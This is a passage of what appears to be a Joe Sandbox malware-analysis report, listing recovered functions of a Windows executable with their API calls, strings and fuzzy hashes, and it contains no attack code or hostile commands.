                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 00D97A7A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: String
                                                                                      • String ID: LCMapStringEx$d0F
                                                                                      • API String ID: 2568140703-2145499720
                                                                                      • Opcode ID: 181b859a829bf4545e3ad02a4926922b8c25cac83eccf838ec0920e4e3e07547
                                                                                      • Instruction ID: a05e4cce0d7b85b8733abd526a301ca7133cf83aa148bccd2bdc2ba5f604244b
                                                                                      • Opcode Fuzzy Hash: 181b859a829bf4545e3ad02a4926922b8c25cac83eccf838ec0920e4e3e07547
                                                                                      • Instruction Fuzzy Hash: 68012572500209BBCF02AF90DC06EEE7F62EF49710F104114FE0965260CA32DA31EBA4
                                                                                      APIs
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D9709A), ref: 00D979F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                      • String ID: InitializeCriticalSectionEx$d0F
                                                                                      • API String ID: 2593887523-4269990031
                                                                                      • Opcode ID: 95325a6fe092377222a09dc8cac61673c46969df07ef5e0a622650f36e39cb0b
                                                                                      • Instruction ID: f24ac0a78b30228f137b750928060b9cce3a084674751647f83a18ac7995c117
                                                                                      • Opcode Fuzzy Hash: 95325a6fe092377222a09dc8cac61673c46969df07ef5e0a622650f36e39cb0b
                                                                                      • Instruction Fuzzy Hash: 21F0B475A45318BBCF016F54DC06DAE7F62DF45711F504114FC1596260DA718E109BF4
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Alloc
                                                                                      • String ID: FlsAlloc$d0F
                                                                                      • API String ID: 2773662609-3126023658
                                                                                      • Opcode ID: 76d4213f7baea12c23c1c17d843ed45564f06f2e416f433f7a9b517be0ba863b
                                                                                      • Instruction ID: ec1dc600063b334247275ce0a0d71cae36ff15390336313776e665c31b5b62ee
                                                                                      • Opcode Fuzzy Hash: 76d4213f7baea12c23c1c17d843ed45564f06f2e416f433f7a9b517be0ba863b
                                                                                      • Instruction Fuzzy Hash: 2BE0E575B453187B8714AF649C0A9AEBF95DB46720F500164FC05A6380DE715E0586F9
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F5,?,?,00D7C853,00000001,?,?,?,00000000,00D8420B,?,?,?,?,?,00D83CB0), ref: 00D79BE3
                                                                                      • WriteFile.KERNEL32(?,00000000,?,00D83EB8,00000000,?,?,00000000,00D8420B,?,?,?,?,?,00D83CB0,?), ref: 00D79C23
                                                                                      • WriteFile.KERNELBASE(?,00000000,?,00D83EB8,00000000,?,00000001,?,?,00D7C853,00000001,?,?,?,00000000,00D8420B), ref: 00D79C50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$Handle
                                                                                      • String ID:
                                                                                      • API String ID: 4209713984-0
                                                                                      • Opcode ID: 167855d870e314d4596875dddd4439b027b12db2799e25030cab1b537db8e4ea
                                                                                      • Instruction ID: 63a2de3505e422ee91ce49fb1036eca19b42759463e2b041e08015730f986b31
                                                                                      • Opcode Fuzzy Hash: 167855d870e314d4596875dddd4439b027b12db2799e25030cab1b537db8e4ea
                                                                                      • Instruction Fuzzy Hash: 20313372108605AFDF218E14D858BA6FBE8EB91710F08C11AF598932D0E775E849CBB2
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D79EAD
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D79EE0
                                                                                      • GetLastError.KERNEL32(?,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D79EFD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 2485089472-0
                                                                                      • Opcode ID: ac4a3ac9c52a83ab267446e6bc3ce1086c192269f841f506058da82f524d997e
                                                                                      • Instruction ID: 72fcdc5b5de1f976d4fc4f0c167c80a2dd9617b782759c090915b38611e01b59
                                                                                      • Opcode Fuzzy Hash: ac4a3ac9c52a83ab267446e6bc3ce1086c192269f841f506058da82f524d997e
                                                                                      • Instruction Fuzzy Hash: F701DE33111218A6DB21EA684C56FEFF75DDF06341F0C8412F84DD2085FB20898197F6
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 11f21922c506a3bd444a14323884bbdcd9cbbfe03ab16efc131558b0915efec1
                                                                                      • Instruction ID: c6f7eb86938db7a8a9adeb3855533a23f2413984a4358a47994adacffb7031ed
                                                                                      • Opcode Fuzzy Hash: 11f21922c506a3bd444a14323884bbdcd9cbbfe03ab16efc131558b0915efec1
                                                                                      • Instruction Fuzzy Hash: 6A119170A11244DEDB14EBB895057AEBAE8EF84304F14446EE44DD7342EBB45E00C772
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3519838083-2756464174
                                                                                      • Opcode ID: 87c39df36f3403231e52b91c2e8d7f6f84d451ede32f49f6d56ebc0aa5242322
                                                                                      • Instruction ID: 6c085fc13a10e1a29c26dfdf31cdc013eee65d735dd1d925bfbb35c08e68d045
                                                                                      • Opcode Fuzzy Hash: 87c39df36f3403231e52b91c2e8d7f6f84d451ede32f49f6d56ebc0aa5242322
                                                                                      • Instruction Fuzzy Hash: 9A619F71504F44AADB21DB74CC519EBB7E8EF14301F44896EE19E87142E732AA48DF31
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D71DA6
                                                                                        • Part of subcall function 00D73AA3: __EH_prolog.LIBCMT ref: 00D73AA8
                                                                                      Strings
                                                                                      Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
Similarity
• API ID: H_prolog
• String ID: CMT
• API String ID: 3519838083-2756464174
• Opcode ID: acd1afb52f31c0292357843683c74abbc46b06011aa8cf5bbc2e70d5368dc4ed
• Instruction ID: 7c2499b6917fe890fc3e3a9420af726aa38e39de6e08b3d3c1e3b5a10a857547
• Opcode Fuzzy Hash: acd1afb52f31c0292357843683c74abbc46b06011aa8cf5bbc2e70d5368dc4ed
• Instruction Fuzzy Hash: D32139369002099FCF15EF98C9419EEFBF5EF48300B104169F849A3251DB325A14DB70
APIs
Strings
Similarity
• API ID: H_prolog
• String ID: CMT
• API String ID: 3519838083-2756464174
• Opcode ID: e3c3bf9b79ed31c382a857c2016be43ded34ba2af2354b1a8ca09f4191ed15b9
• Instruction ID: 7fdbcf3bb1fa78d69263da204c47dd3fdb4ace3820d451727fcc963a2700d75f
• Opcode Fuzzy Hash: e3c3bf9b79ed31c382a857c2016be43ded34ba2af2354b1a8ca09f4191ed15b9
• Instruction Fuzzy Hash: 6F11B474A00201AFDB04DF69C495ABEF7BAFF85300F08825AE55997241EB309956DF70
APIs
• try_get_function.LIBVCRUNTIME ref: 00D91DAF
Strings
Similarity
• API ID: try_get_function
• String ID: FlsAlloc
• API String ID: 2742660187-671089009
• Opcode ID: f0df6a57a8ccd3fb710be2357a296b9241590e9875e83174bfd434b54a99c260
• Instruction ID: d75f1b922492b2d18f9240f4160bd239926fb120aee82909ac06fe1aa4009927
• Opcode Fuzzy Hash: f0df6a57a8ccd3fb710be2357a296b9241590e9875e83174bfd434b54a99c260
• Instruction Fuzzy Hash: 63D05B2EF823256E9B1036D5AC029DABF54CB01BF1F040451FF0C65282D591445556F1
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00D8CD6E
  • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
  • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
Strings
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: 3Ro
• API String ID: 1269201914-1492261280
• Opcode ID: c16e7c5f638bee312da0d90fa025165c50bcd3182fa95d5d33f957a80811efb9
• Instruction ID: 76460df41a23708e32a45c0f941ed72d245c96d9fcf4ece4e67e482a571c6623
• Opcode Fuzzy Hash: c16e7c5f638bee312da0d90fa025165c50bcd3182fa95d5d33f957a80811efb9
• Instruction Fuzzy Hash: 9EB012C1279001FD3128B3089E02C37010CC0C2F50330556FF842D4190A8644C06D132
APIs
• __EH_prolog.LIBCMT ref: 00D71383
  • Part of subcall function 00D75FB1: __EH_prolog.LIBCMT ref: 00D75FB6
  • Part of subcall function 00D7C413: __EH_prolog.LIBCMT ref: 00D7C418
  • Part of subcall function 00D7C413: new.LIBCMT ref: 00D7C45B
  • Part of subcall function 00D7C413: new.LIBCMT ref: 00D7C47F
• new.LIBCMT ref: 00D713FB
  • Part of subcall function 00D7AC66: __EH_prolog.LIBCMT ref: 00D7AC6B
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 7ab43ab52c29aee32465520c8c3c4b109d3419fb472948830b6b90e46be33b33
• Instruction ID: 82198c9f342bb8159d7a08466cfb681697380b29db2bb7bd6d6fbd296c357382
• Opcode Fuzzy Hash: 7ab43ab52c29aee32465520c8c3c4b109d3419fb472948830b6b90e46be33b33
• Instruction Fuzzy Hash: 3C4147B0805B40DED724DF798485AE6FBE5FF28300F508A2ED5EE87282DB326554CB25
APIs
• __EH_prolog.LIBCMT ref: 00D71383
  • Part of subcall function 00D75FB1: __EH_prolog.LIBCMT ref: 00D75FB6
  • Part of subcall function 00D7C413: __EH_prolog.LIBCMT ref: 00D7C418
  • Part of subcall function 00D7C413: new.LIBCMT ref: 00D7C45B
  • Part of subcall function 00D7C413: new.LIBCMT ref: 00D7C47F
• new.LIBCMT ref: 00D713FB
  • Part of subcall function 00D7AC66: __EH_prolog.LIBCMT ref: 00D7AC6B
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: d499ac369bfd7e679be2b7f0a8fccd22ddb7d1adbc24d37c40b26acbe36a2750
• Instruction ID: 1d3cdd64fbfbafd38c02f6c1350db9fd275e32ac3097dbbd6e6876dfc362922d
• Opcode Fuzzy Hash: d499ac369bfd7e679be2b7f0a8fccd22ddb7d1adbc24d37c40b26acbe36a2750
• Instruction Fuzzy Hash: BF4137B0805B40DED725DF798485AE6FBE5FF28300F508A2ED5EE83282DB726554CB25
APIs
  • Part of subcall function 00D9631F: GetLastError.KERNEL32(?,00DACBE8,00D92674,00DACBE8,?,?,00D92213,?,?,00DACBE8), ref: 00D96323
  • Part of subcall function 00D9631F: _free.LIBCMT ref: 00D96356
  • Part of subcall function 00D9631F: SetLastError.KERNEL32(00000000,?,00DACBE8), ref: 00D96397
  • Part of subcall function 00D9631F: _abort.LIBCMT ref: 00D9639D
  • Part of subcall function 00D98576: _abort.LIBCMT ref: 00D985A8
  • Part of subcall function 00D98576: _free.LIBCMT ref: 00D985DC
  • Part of subcall function 00D981EB: GetOEMCP.KERNEL32(00000000,?,?,00D98474,?), ref: 00D98216
• _free.LIBCMT ref: 00D984CF
• _free.LIBCMT ref: 00D98505
Similarity
• API ID: _free$ErrorLast_abort
• String ID:
• API String ID: 2991157371-0
• Opcode ID: 55a95d8d6b3a622ae0681c2ebf6b97edaceba1fdb73fa1f6521f582d08c21361
• Instruction ID: 5e2c551f55ef49f4c1ae63bfbaac3ffc61a0c88ea1cb4360378cad9453db8627
• Opcode Fuzzy Hash: 55a95d8d6b3a622ae0681c2ebf6b97edaceba1fdb73fa1f6521f582d08c21361
• Instruction Fuzzy Hash: 93318231904209AFDF11EFA9D441A9D77E5EF42720F2941A9F8089B292DF369E41EB70
APIs
• CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D79B87,?,?,00D77735), ref: 00D79579
• CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D79B87,?,?,00D77735), ref: 00D795AE
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: ba69dd878880859739a3bc5b477bee0547f29039030e379503c53a1e013dc02b
• Instruction ID: 9dc7291e0780f038ccc38023fca62bc9d4cc480499f575c8f7afcbf2c6aa569e
• Opcode Fuzzy Hash: ba69dd878880859739a3bc5b477bee0547f29039030e379503c53a1e013dc02b
• Instruction Fuzzy Hash: AF21E4B2004748AFD7318F14C845BA7BBE8EB49764F04892DF5E982191E274AD499B71
APIs
• FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00D77436,?,?,?), ref: 00D79A2C
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00D79ADC
Similarity
• API ID: File$BuffersFlushTime
• String ID:
• API String ID: 1392018926-0
• Opcode ID: 945dc72baf1813494cafc0e5b47fe1f849d7452ae7fce4f6be2e0acf052c66e3
• Instruction ID: db38a069ef63447dc5e58df3e6d628419cee51c72173df7fc70d867e2606d806
• Opcode Fuzzy Hash: 945dc72baf1813494cafc0e5b47fe1f849d7452ae7fce4f6be2e0acf052c66e3
• Instruction Fuzzy Hash: 7121E432149341AFC711DB24C8A1AAAFBD4AF56704F08891CF8D9C7191E729ED0CC771
APIs
• SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00D79B21
• GetLastError.KERNEL32 ref: 00D79B2D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 2976181284-0
                                                                                      • Opcode ID: 94daa6eb8a36a10e022305be31ce4a42c3ac1773311e9b5e00ca2e73e6abf1e6
                                                                                      • Instruction ID: 90e7702843b4fe64ea87c5d74c6afb0bb551878bcd39a421f745f76955623034
                                                                                      • Opcode Fuzzy Hash: 94daa6eb8a36a10e022305be31ce4a42c3ac1773311e9b5e00ca2e73e6abf1e6
                                                                                      • Instruction Fuzzy Hash: 700192727057046BDB349E29EC95766F7D99B85324F14C53EB15AC3680EA31E8088631
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00D798EB
                                                                                      • GetLastError.KERNEL32 ref: 00D798F8
                                                                                        • Part of subcall function 00D796AA: __EH_prolog.LIBCMT ref: 00D796AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileH_prologLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 4236474358-0
                                                                                      • Opcode ID: 33c8fa08b30bb147ff5f97f5118c6cbdf935f9e5ade164f884e158ae1e22517f
                                                                                      • Instruction ID: eaaac553936fa8ff06a305632c992f82e21701ef3516c4b98d6a23637d33100c
                                                                                      • Opcode Fuzzy Hash: 33c8fa08b30bb147ff5f97f5118c6cbdf935f9e5ade164f884e158ae1e22517f
                                                                                      • Instruction Fuzzy Hash: 6F01B5376002059BDB188E598C645AAF759EF47330718C36EE92ECB390E730DC018B71
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00D95B0B
                                                                                        • Part of subcall function 00D959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D923AA,?,0000015D,?,?,?,?,00D92F29,000000FF,00000000,?,?), ref: 00D95A2E
                                                                                      • RtlReAllocateHeap.NTDLL(00000000,?,00200000,?,?,00DACBE8,00D717A1,?,?,?,?,00000000,?,00D71378,?,?), ref: 00D95B47
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap$_free
                                                                                      • String ID:
                                                                                      • API String ID: 1482568997-0
                                                                                      • Opcode ID: cd23a84d4ae38a36b44328931e99e9584f81eb10c27d5d1b357caff3908b7f6c
                                                                                      • Instruction ID: 43e14c07c72de2a8ab2ecbe72cba511eee745acae1d8f9c39a60604e41129807
                                                                                      • Opcode Fuzzy Hash: cd23a84d4ae38a36b44328931e99e9584f81eb10c27d5d1b357caff3908b7f6c
                                                                                      • Instruction Fuzzy Hash: B3F06232701A15A6DF333E25BC01F6A375CDF91775B184135F868961A9DA30CC0187B1
                                                                                      APIs
                                                                                      • LoadStringW.USER32(?,?,00000200,?), ref: 00D7D187
                                                                                      • LoadStringW.USER32(?,?,00000200,?), ref: 00D7D19D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
